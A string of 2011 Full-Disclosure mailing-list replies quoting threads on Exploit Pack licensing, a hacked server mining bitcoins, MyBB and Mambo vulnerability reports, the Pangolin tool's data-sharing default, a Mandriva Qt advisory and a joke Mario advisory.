Dokie? 1. This is not a chatting room 2. This is not Exploit Pack Dev list Having that in mind: If you feel like you have to really make another nonsense question after you read all the thread. Then and just then. Send a email to Exploit Pack Dev list. Please check: http://exploitpack.com/faq And: http://www.gnu.org/licenses/gpl-3.0.html if you continue having question about GPL v3 I already make a change on the git repository for you root ro...@fibertel.com.ar and your friend xD 0x41 sec...@gmail.com, hope next time you expend two cent for this project. https://github.com/exploitpack/trunk/blob/master/https://github.com/exploitpack/trunk/blob/master/Exploit%20Pack/exploits/code/EasyFTPServer1.7.11.py #You should have received a copy of the GNU General Public License along with this program. #If not, see http://www.gnu.org/licenses/ # Script Author: [Coder Name] # Thanks for let us use this script on Exploit Pack JSacco On Thu, Oct 6, 2011 at 12:34 AM, root ro...@fibertel.com.ar wrote: Juan, You don't have the faintest idea of how licencing works. You cannot slap a GPL v3 license to any software you see, much less erase the author's names. If you find a code in the internet without any license, you pretty much can't touch it, and must re-implement it completely. Software business steal code all the time, but they don't release the software for everybody to see! Next time instead of a few laughs at a list, you may get sued and lose real money, you fool. Please learn how licensing works and just then republish all your code. On 10/05/2011 06:25 PM, Juan Sacco wrote: If you want the right to demand certain things from the program, then go BUY a program and do not harass people who are writing software for free, or go and help the developers by writing the functionality yourself. Juan Sacco On Wed, Oct 5, 2011 at 6:32 AM, root ro...@fibertel.com.ar wrote: - * @author Stefan Zeiger (szei...@novocode.com) - printWritten by Blake - Information Author=Blake Date=August 23 2011 Vulnerability=N/A +#Exploit Pack - Security Framework for Exploit Developers +#Copyright 2011 Juan Sacco http://exploitpack.com +# +#This program is free software: you can redistribute it and/or modify it
Re: [Full-disclosure] New open source Security Framework
Re: putting things in the public domain: Daniel J. Bernstein and Lawrence Rosen (of Creative Commons fame, I believe) seem to disagree with you on that: http://cr.yp.to/publicdomain.html Plus, pretty much the only 'license' djb uses is public domain, so qmail, djbdns, etc. are all public domain. Incidentally, SQLite (*not* written by djb) is *also* public domain, and very widely used, too. As for being sued for public domain code... I would say it is hard to sue an owner that does not exist (which is what public domain seems to do). Plus, they would probably have to prove malice or something. (I personally still wouldn't do it though!) On Oct 6, 2011 7:02 AM, valdis.kletni...@vt.edu wrote: On Thu, 06 Oct 2011 00:34:00 -0300, root said: You don't have the faintest idea of how licencing works. You cannot slap a GPL v3 license to any software you see, much less erase the author's names. If you find a code in the internet without any license, you pretty much can't touch it, and must re-implement it completely. In particular, if code was written in a country that's a signatory to the Berne conventions, it's usually somewhere between very difficult and impossible to actually place a software work in the public domain - at least under US law, even putting an explicit This work is hereby placed in the public domain quite likely does *NOT* suffice - the only two clear ways to public domain in the US are expiration of the lifetime of the author plus 75 years copyright, and works for hire by a US federal government employee as part of his duties (so, for instance, NASA photographs are public domain - but photos of NASA activities taken by non-NASA photographers probably aren't). Also, smart programmers *don't* release their code into the public domain - that means that anybody can do anything with it. And that includes stealing it, using it to make tons of money, and then suing you if they discover a bug. The original reason for the BSD and X11 licenses was because you can't stick a hold harmless clause on something you public-domain. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Hacked servers mining for bitcoins?
Hmm -- that's interesting. I wonder if it would be possible/feasible to build a botnet in this fashion that would overtake legitimate bitcoin nodes in terms of CPU power. (You probably know what would happen then) On Jul 19, 2011 12:11 PM, Robin ro...@rbsec.net wrote: Had to deal with a server today that had been hacked (still running realVNC 4.0, so there's that lovely bypass exploit released 4 years ago). This server was an exchange/domain controller for a small business. Not much seemed to have been done to it. From the looks of it, all the attacker had done was make themselves a new account (domain user, local admin, username 'sys'), and had then logged into it, downloaded the Ufasoft bitcoin miner from a russian file sharing site, and then run it. The file was called `mmc.exe`, and was saved in the new account's `My Documents`. No other attempts to hide what was being done. Has anyone seen this before? Can you make more money from generating bitcoins on a hacked server than sending spam from it? The value of bitcoin is usually offset by the cost of generating it, but if you're using other people's resources to do it, it suddenly seems much more attractive. This looked like a fairly amateur attempt, so it could be a one-off skiddy, but maybe others will follow... ~Robin ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Mambo CMS 4.6.x (4.6.5) | Multiple Cross Site Scripting Vulnerabilities
On Mon, Jun 27, 2011 at 8:04 PM, YGN Ethical Hacker Group li...@yehg.netwrote: The XSS results are from purely blackbox scan on Mambo 4.6.5. Wait, so you're telling me that you're running some program to find these and then just reporting the results to this list? If so, please give some credit to the program's author for actually finding these! Or, if you mean you're just blindly throwing XSS attacks at random variables hoping to find one that sticks... well, why hasn't a script been written for this yet? (Or if one has, what's it called?) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Lutz and Laws
Can I have some of what you're having? On Jun 17, 2011 8:37 PM, RandallM randa...@fidmail.com wrote: Only God has created the perfect laws that none have not broken. Man has created in his finite way shadows of these. But not perfect. But they are laws to regulate the good of all. Lutz, you have screwed these in you perhaps well meaning beginning way. Not for the good of others but have harmed the innocent. You have now proved the laws you strike against. You have become trapped in the Se7en sins one at a time. Surely, slowly. Rolling along, they are your down fall. -- been great, thanks RandyM a.k.a System ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] (no subject)
To borrow a mechanism from 'chan' boards... not telling how everything works expecting me to trust it blindly false positives extremely possible arrogant affirmation of probably inflated success rate and development periods anonymity-hostile Lol wat On Jun 9, 2011 6:21 PM, n...@myproxylists.com wrote: On Fri, 10 Jun 2011 02:40:16 +0300, n...@myproxylists.com said: Im happy to hear it works out to you. A few days ago, i received an email from https://www.proxpn.com/ admin that he suspended fraudulent user VPN account due to the abuse. A fraudster used a stolen credit card using their VPN to purchase a service from us. Needless to say, their CIDR's has been also added to this list. You're incredibly lucky it was proxpn.com and not comcast.com. ;) I sense sarcasm. Im exacly aware of comcast and almost all other U.S cable providers residental address ranges. Did you happend to know that comcast do also provide static IP's for companies, dedicated hosting. Im also fully aware of botnet proxies that are spreaded wide to comcast ranges, not only to comcast, to a majority of U.S cable providers. We have a method to detect some of those botnet proxies but I wont go in to details for obvious reasons. Once again, almost none of you did not bothered to read features. You have the option to CHOOSE will you block hosting providers or not. It does not block anything by default. This is my last reply to this topic. Simply, it does provide protection to those who wants it and everyone can configure their API in the way they want. None is not enforced to block anything. Period. Atleast I managed to open discussion. Something else than daily boring XSS/CRLF bugs. Thanks to everyone for the feedback and interests, whether it was positive or negative. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Musn'tlive
To warn us all about Theo's latest rootkits and collusions with the governments of course. On May 2, 2011 10:02 AM, Cal Leeming c...@foxwhisper.co.uk wrote: Huh? On Mon, May 2, 2011 at 10:43 AM, phocean 0...@phocean.net wrote: OpenBSD 4.9 was released... where is Musn'tlive ?? :D -- phocean ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Multiple vulnerabilities in MyBB
I had another question too -- this one a bit more general. With services like deathbycaptcha, could CAPTCHA itself now be considered insufficient anti-automation, and how would you address that? On Apr 25, 2011 11:59 AM, MustLive mustl...@websecurity.com.ua wrote: Hello Andrew! You're kidding, right? No, I'm serious - as I'm always serious when talk about vulnerabilities. Revealing the names of forum users is practically core functionality. Of course it's core functionality. But the hole, as I exactly wrote in my advisory, is in revealing of logins. So issue is laying in using logins as a names, so in result the showing names at different parts of the forum is leading to leakage of logins. It's quite widespread in forum engines and other webapps to disclose their logins (via different Information Leakage and Abuse of Functionality holes) as nothing important. Some CMS like Drupal even have official answer concerning this issue (http://drupal.org/node/1004778). From my side, I've informed Drupal developers about 8 login leakage holes which I found (in Drupal 6, new 7 version must have them all, because of developers' ignoring of this issue) and gave them recommendations why and how to fix such holes to not reveal logins and to preserve Drupal's philosophy. Many forums (almost all) have similar login leakage vulnerabilities. For example IPB and Vbulletin, which developers I've informed about them in 2009. Like I informed many other developers and admins about such holes, beside developers of MyBB (which ignored to fix them, as many like to do). I saw a lot of such vulnerabilities for more then six years. And in 2008 I started to write about them at my site (like about holes in WordPress), wrote article Enumerating logins via Abuse of Functionality vulnerabilities (http://websecurity.com.ua/2840/) and starting from 2009 I've begun actively fighting with them - by informing many admins and developers about such vulnerabilities. In my practice most web developers and admins of sites ignored such holes, but there were those who fixed them. For example developers of IPB, which have such holes in IPB 1 and 2, after my informing (at begging of 2009) fixed all such holes in their engine in IPB 3 (it have released in summer 2009). It must be obvious why I'm using Invision Power Board as engine for my forum for more then 6 years. The first one requires an activation code sent by email. This IAA hole can be used for automatic registration. Altogether with IAA hole at registration page. To put captcha to first or to second or to both of the pages - it's up to developers. But the protection must be reliable. Plus they have login leakage in this functionality. I've informed developers of MyBB about all (which I found at brief looking at this engine) login leakage vulnerabilities. The second one This functionality with IAA allows spammers to identify valid e-mails of existing forum users and also allows to spam registered users from the forum with password recovery letters. Both of which can be easily mitigated by installing captcha at this functionality. Best wishes regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua - Original Message - From: Andrew Farmer andf...@gmail.com To: MustLive mustl...@websecurity.com.ua Cc: Full Disclosure full-disclosure@lists.grok.org.uk Sent: Saturday, April 23, 2011 10:32 PM Subject: Re: [Full-disclosure] Multiple vulnerabilities in MyBB On 2011-04-22, at 09:21, MustLive wrote: Information Leakage (WASC-13): Logins are names of the users at the forum (and so it's possible to reveal logins at forum's pages). You're kidding, right? Revealing the names of forum users is practically core functionality. There's no expectation whatsoever that they be kept secret - they're displayed all over the site, and a member list (giving you the ability to download ALL USER NAMES ON THE FORUM OMG) is enabled by default. Insufficient Anti-automation (WASC-21): http://site/member.php?action=activateuid=1 http://site/member.php?action=lostpw These functionalities have no protection from automated attacks (captcha). The first one requires an activation code sent by email. I suppose you could *try* to brute-force it, but you'd probably have better luck brute-forcing the password on the email address you sent the activation to. The second one... well, I suppose you could use it to try to determine whether email addresses belong to anyone on the forum, or send annoying password reset emails, but adding a CAPTCHA wouldn't really change that much. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter:
Re: [Full-disclosure] Unbelivable, Pangolin 3.2.3 free edition released
Heh -- did anyone else just get spammed by these jokers? In any case: even if you change this setting where they tell you to, does the code actually honor the change or is it just a farce for the user's benefit? And, perhaps more importantly, why should I have to grab it, blindly trust it and run it to find out? Besides even that, assuming the change was actually honored, how would one go about creating a page that would work with it? On Mon, Apr 25, 2011 at 8:31 AM, Steven Pinkham steve.pink...@gmail.comwrote: Rain Liu wrote: Hi Steven Pinkham, I think this is an old questions that have been answered. You can make settings in Pangolin main panel. Edit-Setting-Oracle, Change the Remote Data URL and Remote Info URL as you wish. Exit pangolin and run it again to take effects. Here is example settings http://www.nosec-inc.com/en/images/pangolin-oracle-setting.gif Wish you guys happy. BEST REGARDS TO YOU AND YOUR FAMILY Rain Liu It's entirely possible that is all there is to it. Let me be perfectly clear: For people in the real world to trust your tool, those fields should be empty by default, and clear instructions and demo code should be given on how to set that feature up on their own servers. A poorly documented feature that sends your data to third parties by default *is unacceptable*, and if you want professional users to take you seriously data privacy needs to be the default. There's still a lot of questions that are poorly documented like: How does the feature you call bypass firewall work? What if any 3rd parties are involved? Can you certify that there no third parties involved in any action of Pangolin besides the Oracle setting, or are there other undiscovered pitfalls for the professional user? The existence of this poorly documented, data stealing by default option completely undermines my trust in your tool, and I would be VERY cautious in any use of said tool. Personally, I'd rather stick to open source, auditable tools whenever possible, and sqlmap is my sql injection tool of choice. Honestly, your answers to these questions are not likely to make me switch(sqlmap is *that good* in recent releases), but may serve to cut down on my abuse of people who consider using your tool. -- | Steven Pinkham, Security Consultant| | http://www.mavensecurity.com | | GPG public key ID CD31CAFB | ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Multiple vulnerabilities in MyBB
So if you try to sign up with a website and it tells you the username is already taken, is that a login leakage vulnerability? Just want to be clear. On Apr 25, 2011 11:59 AM, MustLive mustl...@websecurity.com.ua wrote: Hello Andrew! You're kidding, right? No, I'm serious - as I'm always serious when talk about vulnerabilities. Revealing the names of forum users is practically core functionality. Of course it's core functionality. But the hole, as I exactly wrote in my advisory, is in revealing of logins. So issue is laying in using logins as a names, so in result the showing names at different parts of the forum is leading to leakage of logins. It's quite widespread in forum engines and other webapps to disclose their logins (via different Information Leakage and Abuse of Functionality holes) as nothing important. Some CMS like Drupal even have official answer concerning this issue (http://drupal.org/node/1004778). From my side, I've informed Drupal developers about 8 login leakage holes which I found (in Drupal 6, new 7 version must have them all, because of developers' ignoring of this issue) and gave them recommendations why and how to fix such holes to not reveal logins and to preserve Drupal's philosophy. Many forums (almost all) have similar login leakage vulnerabilities. For example IPB and Vbulletin, which developers I've informed about them in 2009. Like I informed many other developers and admins about such holes, beside developers of MyBB (which ignored to fix them, as many like to do). I saw a lot of such vulnerabilities for more then six years. And in 2008 I started to write about them at my site (like about holes in WordPress), wrote article Enumerating logins via Abuse of Functionality vulnerabilities (http://websecurity.com.ua/2840/) and starting from 2009 I've begun actively fighting with them - by informing many admins and developers about such vulnerabilities. In my practice most web developers and admins of sites ignored such holes, but there were those who fixed them. For example developers of IPB, which have such holes in IPB 1 and 2, after my informing (at begging of 2009) fixed all such holes in their engine in IPB 3 (it have released in summer 2009). It must be obvious why I'm using Invision Power Board as engine for my forum for more then 6 years. The first one requires an activation code sent by email. This IAA hole can be used for automatic registration. Altogether with IAA hole at registration page. To put captcha to first or to second or to both of the pages - it's up to developers. But the protection must be reliable. Plus they have login leakage in this functionality. I've informed developers of MyBB about all (which I found at brief looking at this engine) login leakage vulnerabilities. The second one This functionality with IAA allows spammers to identify valid e-mails of existing forum users and also allows to spam registered users from the forum with password recovery letters. Both of which can be easily mitigated by installing captcha at this functionality. Best wishes regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua - Original Message - From: Andrew Farmer andf...@gmail.com To: MustLive mustl...@websecurity.com.ua Cc: Full Disclosure full-disclosure@lists.grok.org.uk Sent: Saturday, April 23, 2011 10:32 PM Subject: Re: [Full-disclosure] Multiple vulnerabilities in MyBB On 2011-04-22, at 09:21, MustLive wrote: Information Leakage (WASC-13): Logins are names of the users at the forum (and so it's possible to reveal logins at forum's pages). You're kidding, right? Revealing the names of forum users is practically core functionality. There's no expectation whatsoever that they be kept secret - they're displayed all over the site, and a member list (giving you the ability to download ALL USER NAMES ON THE FORUM OMG) is enabled by default. Insufficient Anti-automation (WASC-21): http://site/member.php?action=activateuid=1 http://site/member.php?action=lostpw These functionalities have no protection from automated attacks (captcha). The first one requires an activation code sent by email. I suppose you could *try* to brute-force it, but you'd probably have better luck brute-forcing the password on the email address you sent the activation to. The second one... well, I suppose you could use it to try to determine whether email addresses belong to anyone on the forum, or send annoying password reset emails, but adding a CAPTCHA wouldn't really change that much. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by
Re: [Full-disclosure] iPhone Geolocation storage
That only seems to apply to Android 3.x, which is not even the most prevalent Android version in the wild. In fact, I think it can only be found on tablets at present, and presumably Google will release the source when they have 3.x stuff workable in mobile phones as well. On Wed, Apr 20, 2011 at 5:34 PM, Marcio B. Jr. marcio.barb...@gmail.comwrote: On Wed, Apr 20, 2011 at 4:41 PM, Michael Holstein michael.holst...@csuohio.edu wrote: Pretty scary btw. I hope there's not the equivalent for Android. anyone can git the android repository and look at the source I'm sorry? http://www.zdnet.com/blog/google/google-android-30-honeycomb-open-source-no-more/2845 Marcio Barbado, Jr. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] iPhone Geolocation storage
On Wed, Apr 20, 2011 at 6:04 PM, Marcio B. Jr. marcio.barb...@gmail.comwrote: On Wed, Apr 20, 2011 at 9:45 PM, Zach C. fxc...@gmail.com wrote: That only seems to apply to Android 3.x, only seems to apply is a sloppy euphemism. Correct sentence is: IT DOES APPLY. I guess context is for the weak, since Android 2.3 (the latest non-3.x version) source is out ( http://www.androidcentral.com/samsung-releases-gingerbread-source-code-i9000), and the source was also released for all previous versions -- specifically, every version except 3.0. So, it applies to Android 3.0, sure, but that's the only version it applies to, and Google indicates they will be releasing source when it's actually finished and ready to be released on all the platforms Android currently runs on. which is not even the most prevalent Android version in the wild. In fact, I think it can only be found on tablets at present, Oh, I see. And that would be one hugely extenuating fact. Sure. Well, considering every version prior is more prevalent than 3.0 is, and Google will be releasing source... yeah. But keep clutching that teddy-bear of spiteful vindication that Google didn't release the source code for *one* version of Android! Oh mommy, GSoC rules! Google is so into FOSS! They sure are. :D On Wed, Apr 20, 2011 at 5:34 PM, Marcio B. Jr. marcio.barb...@gmail.com wrote: On Wed, Apr 20, 2011 at 4:41 PM, Michael Holstein michael.holst...@csuohio.edu wrote: Pretty scary btw. I hope there's not the equivalent for Android. anyone can git the android repository and look at the source I'm sorry? http://www.zdnet.com/blog/google/google-android-30-honeycomb-open-source-no-more/2845 Marcio Barbado, Jr. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ Marcio Barbado, Jr. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [ MDVSA-2011:074 ] qt4
That's your cue, guys who reported every single program using the same DLL vulnerable to DLL hijacking! Find those bad certs and start reporting every single application using Qt! THE WORLD IS COUNTING ON YOU TO INFORM US OF THESE THREATS TO OUR SECURITY. On Apr 12, 2011 10:19 AM, secur...@mandriva.com wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2011:074 http://www.mandriva.com/security/ ___ Package : qt4 Date : April 12, 2011 Affected: 2009.0, 2010.0, 2010.1 ___ Problem Description: It was discovered that the QT packages were affected by the fraudalent certificates problem as well, the same issue as with firefox (MDVSA-2011:068). Packages for 2009.0 are provided as of the Extended Maintenance Program. Please visit this link to learn more: http://store.mandriva.com/product_info.php?cPath=149amp;products_id=490 The updates packages has been patched to solve this issue. ___ References: http://www.mandriva.com/security/advisories?name=MDVSA-2011:068 http://bugreports.qt.nokia.com/browse/QTBUG-18338 ___ Updated Packages: Mandriva Linux 2009.0: d3405100e866576e8bac7f69b853067d 2009.0/i586/libqassistant4-4.5.2-1.7mdv2009.0.i586.rpm c4f56332b868a3691cde2a5c0448aef7 2009.0/i586/libqt3support4-4.5.2-1.7mdv2009.0.i586.rpm b64ab10ea49540af8459ab4000c7767b 2009.0/i586/libqt4-devel-4.5.2-1.7mdv2009.0.i586.rpm 278bb8ccef79394b76e888d7fd98f23d 2009.0/i586/libqtclucene4-4.5.2-1.7mdv2009.0.i586.rpm 7610dd11459c2fe502abbb972a00ac44 2009.0/i586/libqtcore4-4.5.2-1.7mdv2009.0.i586.rpm 664d25b0f1af2ad0d0f77511ec4d895b 2009.0/i586/libqtdbus4-4.5.2-1.7mdv2009.0.i586.rpm 40a9ec8c4df313b4a39091611f96 2009.0/i586/libqtdesigner4-4.5.2-1.7mdv2009.0.i586.rpm 7fe0928e378629086beb6c2623e713cc 2009.0/i586/libqtgui4-4.5.2-1.7mdv2009.0.i586.rpm 6f5885626d703d80690d629b882b78b9 2009.0/i586/libqthelp4-4.5.2-1.7mdv2009.0.i586.rpm 3121fb0365a15285b2af0030e636ca85 2009.0/i586/libqtnetwork4-4.5.2-1.7mdv2009.0.i586.rpm e215b687c05f2b6b8724b3bab62647a0 2009.0/i586/libqtopengl4-4.5.2-1.7mdv2009.0.i586.rpm 2a4f7ed94a4124b8e492beae6cb4e41c 2009.0/i586/libqtscript4-4.5.2-1.7mdv2009.0.i586.rpm 34f3a481dc7491a14da1f819518518cf 2009.0/i586/libqtscripttools4-4.5.2-1.7mdv2009.0.i586.rpm 26700ef0087c7a673739221dbde454a6 2009.0/i586/libqtsql4-4.5.2-1.7mdv2009.0.i586.rpm 3a159ca06df2944229f14fedf6e5d0d3 2009.0/i586/libqtsvg4-4.5.2-1.7mdv2009.0.i586.rpm a8b4d8d02503127c20137e5cd1feeb2f 2009.0/i586/libqttest4-4.5.2-1.7mdv2009.0.i586.rpm 40377a353b4a722125a8cc3227da999b 2009.0/i586/libqtwebkit4-4.5.2-1.7mdv2009.0.i586.rpm 094aa1b4fecc14f526321a2cba1ba6be 2009.0/i586/libqtxml4-4.5.2-1.7mdv2009.0.i586.rpm 5a47b688005c38217d2ebd2aaacaab22 2009.0/i586/libqtxmlpatterns4-4.5.2-1.7mdv2009.0.i586.rpm 6108509ae6fd3c630344dbd22ae73069 2009.0/i586/qt4-accessibility-plugin-4.5.2-1.7mdv2009.0.i586.rpm 94123cd2a7b847b2942f59dcf4f93f94 2009.0/i586/qt4-assistant-4.5.2-1.7mdv2009.0.i586.rpm cebb3584f250b31ceae49b1bdfbc271a 2009.0/i586/qt4-common-4.5.2-1.7mdv2009.0.i586.rpm 93446ee40dca08fcf3672fcba2f9e4ab 2009.0/i586/qt4-database-plugin-mysql-4.5.2-1.7mdv2009.0.i586.rpm 60e58167df55713d856890ebb83f5d7a 2009.0/i586/qt4-database-plugin-odbc-4.5.2-1.7mdv2009.0.i586.rpm dade28e78b5f464bd0dfad103e7c42c3 2009.0/i586/qt4-database-plugin-pgsql-4.5.2-1.7mdv2009.0.i586.rpm d36ef5589cc939b57af7a31c600dd83a 2009.0/i586/qt4-database-plugin-sqlite-4.5.2-1.7mdv2009.0.i586.rpm fcc6ada23f0c2240aec2847220ebeeb9 2009.0/i586/qt4-database-plugin-tds-4.5.2-1.7mdv2009.0.i586.rpm 9aa0dfe289e72d711826c95988f2b1c4 2009.0/i586/qt4-designer-4.5.2-1.7mdv2009.0.i586.rpm 03d6d09a7d1ff9806f76259a44374f69 2009.0/i586/qt4-doc-4.5.2-1.7mdv2009.0.i586.rpm a7905f55658bb95983e804b2f410d239 2009.0/i586/qt4-examples-4.5.2-1.7mdv2009.0.i586.rpm 03db0fc6e0a7da2a5b41e234e820cfdb 2009.0/i586/qt4-graphicssystems-plugin-4.5.2-1.7mdv2009.0.i586.rpm 96137650ff0e8d3044b8d0a9812f168d 2009.0/i586/qt4-linguist-4.5.2-1.7mdv2009.0.i586.rpm b6dc9f1a15a6075bf0961adbfe93263c 2009.0/i586/qt4-qdoc3-4.5.2-1.7mdv2009.0.i586.rpm 1a9108aeeae481a176403db5cdce35f4 2009.0/i586/qt4-qtconfig-4.5.2-1.7mdv2009.0.i586.rpm 10b5df5dcd6ca2afbb60d056ccdfe6d8 2009.0/i586/qt4-qtdbus-4.5.2-1.7mdv2009.0.i586.rpm ebc0b9e53f1f1495d2cffb61938dbcf1 2009.0/i586/qt4-qvfb-4.5.2-1.7mdv2009.0.i586.rpm de31a6925a9965f363fc1e8e98227c90 2009.0/i586/qt4-xmlpatterns-4.5.2-1.7mdv2009.0.i586.rpm e92dde56825fb3456c7c82b7550c6dd8 2009.0/SRPMS/qt4-4.5.2-1.7mdv2009.0.src.rpm Mandriva Linux 2009.0/X86_64: a0becbaa0c06309d92472b581f9dca42 2009.0/x86_64/lib64qassistant4-4.5.2-1.7mdv2009.0.x86_64.rpm
Re: [Full-disclosure] Plumber Injection Attack in Bowser's Castle
Lakitu Cloud Security, Inc. Heh. That is an awesome company name actually. On Apr 1, 2011 8:46 AM, Nelson Elhage nelh...@ksplice.com wrote: Advisory Name: Plumber Injection Attack in Bowser's Castle Release Date: 2011-04-01 Application: Bowser's Castle Versions: Super Mario Bros., Super Mario Bros.: The Lost Levels Identifier: SMB-1985-0001 Advisory: http://blog.ksplice.com/2011/04/smb-1985-0001-advisory/ --- Vulnerability Overview -- Multiple versions of Bowser's Castle are vulnerable to a plumber injection attack. An Italian plumber could exploit this bug to bypass security measures (walk through walls) in order to rescue Peach, to defeat Bowser, or for unspecified other impact. Exploit --- http://www.youtube.com/watch?v=rGshxZ1dYjA This vulnerability is demonstrated by happylee-supermariobros,warped.fm2 [1]. Attacks using this exploit have been observed in the wild, and multiple other exploits are publicly available. Affected Versions - Versions of Bowser's Castle as shipped in Super Mario Bros. [2] and Super Mario Bros.: The Lost Levels [3] are affected. Solution http://www.youtube.com/watch?v=nacFU7ozeZA An independently developed patch [4] is available. A binary hot patch [5] to apply the update to an existing version is also available. All users are advised to upgrade. Mitigations --- For users unable to apply the recommended fix, a number of mitigations are possible to reduce the impact of the vulnerability. NOTE THAT NO MITIGATION IS BELIEVED TO BE COMPLETELY EFFECTIVE. Potential mitigations include: - Employing standard defense-in-depth strategies incorporating multiple layers of defense, including Goombas [6], Koopa Troopas [7], Bullet Bills [8], and others. - Installing poison mushrooms outside your castle [9]. - Installing a firewall to limit access to affected systems. [10] - Frequently moving your princess between different castles [11]. Credit -- The vulnerability was originally discovered by Mario and Luigi, of Mario Bros. Security Research. The provided patch and this advisory were prepared by Lakitu Cloud Security, Inc. The hot patch was developed in collaboration with Ksplice, Inc. [12] Product Overview Bowser's Castle is King Bowser's home and the base of operations for the Koopa Troop. Bowser's Castle is the final defense against assaults by Mario to kidnap Princess Peach, and is guarded by Bowser's most powerful minions. [13] References -- [1] http://tasvideos.org/1715M.html [2] http://en.wikipedia.org/wiki/Super_Mario_Bros. [3] http://en.wikipedia.org/wiki/Super_Mario_Bros.:_The_Lost_Levels [4] http://blog.ksplice.com/wp-content/uploads/2011/04/smb-1985-0001.patch [5] http://blog.ksplice.com/wp-content/uploads/2011/04/patch-smb-1985-0001.sh [6] http://www.mariowiki.com/Goomba [7] http://www.mariowiki.com/Koopa_Troopa [8] http://www.mariowiki.com/Bullet_Bill [9] http://www.mariowiki.com/Firebar [10] http://tvtropes.org/pmwiki/pmwiki.php/Main/YourPrincessIsInAnotherCastle [11] http://www.mariowiki.com/Poison_Mushrooms [12] http://www.ksplice.com/ [13] http://www.mariowiki.com/Bowser%27s_Castle ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] SSL Capable NetCat and more
Not to mention the extensions he's undoubtedly using, unless he seriously implemented all the protocols and cryptographic functions in pure Perl On Mar 28, 2011 12:07 AM, Michal Zalewski lcam...@coredump.cx wrote: This one is from command line, maybe the next will be in the server mode or whatever. Man, I hope you never find out what Perl is written in... /mz ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] SSL Capable NetCat and more
Okay, and also let me rephrase the question: what does your tool do that * socat* doesn't? On Sat, Mar 26, 2011 at 1:17 PM, GomoR go...@gomor.org wrote: On Sat, Mar 26, 2011 at 08:10:47PM +0200, Anton Ziukin wrote: What can your tool do that Ncat (http://nmap.org/ncat/guide/index.html) can't? Hi, interestingly, I published version 1.00 of scnc in April 2008, the 27th (and it wasn't the first version to be released): http://www.securiteam.com/tools/5RP0O20O0U.html And more interestingly, ncat has been integrated in nmap SVN in May 2008, the 6th: r7360 | mixter | 2008-05-06 22:11:22 +0200 (Tue, 06 May 2008) | 1 line Initial commit of ncat, as of current sourceforge.net HEAD CVS Considering this timeline, pardon me if I fix bugs found in my softwares, even when some other tools give the same features. Beside that, scnc is written in pure-Perl, and is easily modifiable by anyone. Such really simple (dumb?) stuff should not be written in low-level languages such as C. Regards, -- ^ ___ ___ http://www.GomoR.org/ -+ | / __ |__/Senior Security Engineer | | \__/ | \ ---[ zsh$ alias psed='perl -pe ' ]---| +-- Net::Frame = http://search.cpan.org/~gomor/ ---+ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Vulnerability in reCAPTCHA for Drupal
